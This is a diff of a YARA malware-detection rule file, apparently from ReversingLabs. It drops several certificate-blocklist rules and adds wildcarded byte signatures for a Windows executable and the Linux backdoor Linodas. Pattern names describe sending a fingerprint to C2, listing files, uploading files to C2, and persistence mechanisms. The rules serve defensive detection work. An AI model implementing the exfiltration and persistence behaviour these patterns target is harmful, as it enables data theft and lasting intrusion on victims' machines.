+            13 ?? 11 ?? 1F 50 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 4F 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 53
+            13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 54 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 11 ?? 1F 21 8D ?? ?? ?? ?? 25 16 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F
+            70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F
+            6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F
+            63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F
+            74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09
+        }
+		$send_fingerprint_to_c2_p2 = {
+            1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
+            1F 0B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 78 13 ?? 12 ?? 28 ?? ?? ?? ??
+            A2 25 1F 0D 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 77 13 ?? 12 ?? 28 ?? ??
+            ?? ?? A2 25 1F 0F 1F 77 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 77 13 ?? 12 ?? 28
+            ?? ?? ?? ?? A2 25 1F 11 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 66 13 ?? 12
+            ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 72 13
+            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 16 1F
+            2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
+            18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1F 1A 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ??
+            ?? A2 25 1F 1C 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 6F 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1F 1E 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1F 1F 65 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1F 20 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 11 ?? 08 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 08 16 08 8E 69 6F
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25
+            6F ?? ?? ?? ?? 0D 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 13 ?? DE ?? 26 7E ?? ?? ?? ?? 13
+            ?? DE ?? 11
+        }
+		$get_files_and_directories_p1 = {
+            11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 31 ??
+            11 ?? 17 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1F 0F 8D
+            ?? ?? ?? ?? 25 16 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1A 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 74 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1C 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 72 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 1F 20 13 ?? 12 ?? 28
+            ?? ?? ?? ?? A2 25 1F 0A 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 66 13 ?? 12
+            ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 11 ?? A2
+            25 1F 0E 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28
+            ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ??
+            13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F
+            16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12
+        }
+		$get_files_and_directories_p2 = {
+            28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F 79 13 ?? 12
+            ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13
+            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F
+            3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
+            0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ??
+            ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 3C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 52
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 3E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 72 ??
+            ?? ?? ?? A2 25 1F 09 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ??
+            ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13 ?? 16 13 ?? 38
+            ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ?? 13 ?? 1F 0C 8D ?? ?? ?? ?? 25 16 11 ?? A2
+            25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F 16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1F 09 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13
+        }
+		$get_files_and_directories_p3 = {
+            12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E
+            1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
+            1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ??
+            A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ??
+            ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28
+            ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 46
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 4C
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 45 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 72 ??
+            ?? ?? ?? A2 25 1E 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 72 ??
+            ?? ?? ?? A2 25 1F 0A 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0B 72 ?? ?? ?? ?? A2 28 ?? ?? ??
+            ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 1F 0B 8D ?? ?? ?? ?? 25
+            16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1B 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1D 1F 28 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1F 09 1F 29 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ??
+            ?? 13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E
+            69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F
+        }
+		$upload_file_to_c2_p1 = {
+            11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 3E ?? ?? ?? ?? 11 ??
+            17 9A 17 8D ?? ?? ?? ?? 25 16 1F 22 9D 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 39
+            ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ??
+            13 ?? 1F 0D 8D ?? ?? ?? ?? 25 16 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 40 13
+            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1A 28 ?? ?? ?? ?? A2 25 1B 1F 7C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 28 ?? ?? ??
+            ?? A2 25 1D 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 11 ?? A2 25 1F 09 1F 40 13 ??
+            12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 32 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 40
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 11 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ??
+            02 02 7B ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 1F 1E 8D ?? ?? ?? ?? 25 16 1F 66 13 ??
+            12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 6C 13 ??
+            12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5B 13 ??
+            12 ?? 28 ?? ?? ?? ?? A2 25 1B 11 ?? A2 25 1C 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
+            1D 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
+            1F 09 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28
+        }
+		$upload_file_to_c2_p2 = {
+            A2 25 1F 0B 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 70 13 ?? 12 ?? 28 ?? ??
+            ?? ?? A2 25 1F 0D 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6F 13 ?? 12 ?? 28
+            ?? ?? ?? ?? A2 25 1F 0F 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 64 13 ?? 12
+            ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 64 13
+            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F
+            74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
+            16 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1F 18 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 72 13 ?? 12 ?? 28 ?? ?? ??
+            ?? A2 25 1F 1A 1F 76 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 65 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1F 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 2E 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 1F 0F 8D ?? ?? ?? ?? 25 16 1F
+            66 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F
+            6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F
+            20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "30 PTY LTD" and pe.signatures [ i ] . serial == "6f:83:73:cf:89:f1:b4:91:38:f4:32:81:18:48:7f:9e" and 1572566400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $send_fingerprint_to_c2_p* ) ) and ( all of ( $get_files_and_directories_p* ) ) and ( all of ( $upload_file_to_c2_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_E38259Cf24Cc702Ce441B683Ad578911 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Linodas : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Linodas backdoor."
 		author = "ReversingLabs"
-		id = "fc5df86f-b8c9-58b1-bd41-e03ed50829dd"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "2b197346-abce-5cff-938f-bb8742e03168"
+		date = "2024-05-22"
+		modified = "2024-05-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5004-L5022"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.Linodas.yara#L1-L216"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2428df14a18f4aed1a3db85c1fb43a847fae8a922c6dc948f3bc514dc4cae09c"
+		logic_hash = "12445771106e36b74b1ea292a8a25cab66bcaf0a08cf88d39a9f1bb13c6f525b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Linodas"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Akhirah Technologies Inc." and ( pe.signatures [ i ] . serial == "00:e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" or pe.signatures [ i ] . serial == "e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" ) and 1597276800 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Bdc81Bc76090Dae0Eee2E1Eb744A4F9A : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "66feefd2-9cec-56fc-a1c1-11004363462d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5024-L5042"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4fc3e57bedb6fb7c96e6a1ee2ad2aec3860716ac714d52ea58b86be4bbda4660"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$persistence_mechanism_ubuntu = {
+            41 54 BE ?? ?? ?? ?? 55 53 48 81 EC ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? 48 89
+            EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ?? 48
+            89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48
+            81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? BE ?? ?? ?? ?? 48
+            89 EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ??
+            48 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ??
+            48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 EE 48 89 DF E8 ?? ?? ??
+            ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 BC ?? ?? ?? ?? 48 83 EB ?? 4C 39 E3 0F
+            85 ?? ?? ?? ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7
+            E8 ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0
+            74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8D 5C 24 ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8
+            ?? ?? ?? ?? 48 89 DE 48 89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F
+            85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA
+            ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 5C 24 ?? 4C 8B 44 24
+            ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48
+            89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ??
+            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ??
+            48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49
+            39 DC 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3
+        }
+		$network_communication_1 = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 F3 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 81 EC ?? ??
+            ?? ?? 48 8B 06 48 89 FD 89 54 24 ?? 45 89 C4 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 4C 8D
+            6C 24 ?? 48 8B 33 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 78 ?? ?? 0F 84 ?? ??
+            ?? ?? 45 84 E4 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 45
+            ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 C5 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ?? ??
+            ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
+            ?? ?? ?? 48 8D 5C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ??
+            41 B8 ?? ?? ?? ?? 89 EF 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 48 C7 44 24 ?? ?? ??
+            ?? ?? 66 C1 C8 ?? 66 C7 44 24 ?? ?? ?? 66 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ??
+            89 44 24 ?? 48 89 DE 89 EF E8 ?? ?? ?? ?? 83 C0 ?? 0F 84 ?? ?? ?? ?? 0F 1F 44 00 ??
+            48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24
+            ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+        }
+		$network_communication_2 = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 FB 4C 89 64 24 ?? BE ?? ?? ?? ?? 48 83 EC ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ??
+            ?? ?? ?? 48 8D 73 ?? 48 8D 53 ?? BF ?? ?? ?? ?? 48 8D 6C 24 ?? 45 31 E4 E8 ?? ?? ??
+            ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 73 ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83
+            78 ?? ?? 74 ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ??
+            4C 8D 64 24 ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 48 89 DF E8 ?? ?? ?? ?? 48
+            8B 6C 24 ?? 41 89 C4 48 83 ED ?? 48 81 FD ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 45 84 E4 74
+            ?? 80 7B ?? ?? 0F 84 ?? ?? ?? ?? 90 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 0F B6
+            EC 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24 ?? 48 8B 6C
+            24 ?? 4C 8B 64 24 ?? 48 83 C4 ?? C3
+        }
+		$persistence_mechanism_redhat_v11 = {
+            41 57 41 56 41 55 41 54 55 53 48 83 EC ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24
+            ?? 8B 7D ?? 4C 8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C
+            24 ?? 48 89 EE E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 4C 8D 74
+            24 ?? 4C 89 EA E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8
+            ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E9 4C 89 EA BE ??
+            ?? ?? ?? 48 89 DF 49 89 E9 4D 89 E8 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C4 B9
+            ?? ?? ?? ?? 89 C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89
+            DF E8 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 DF 31 C0 48 8D 6C 24 ?? E8 ?? ?? ??
+            ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 48 89 EF E8 ?? ?? ?? ?? 48 89 E7 31 C9
+            BA ?? ?? ?? ?? 48 89 EE E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 41 BE ?? ?? ?? ?? 4C 8B 24 24
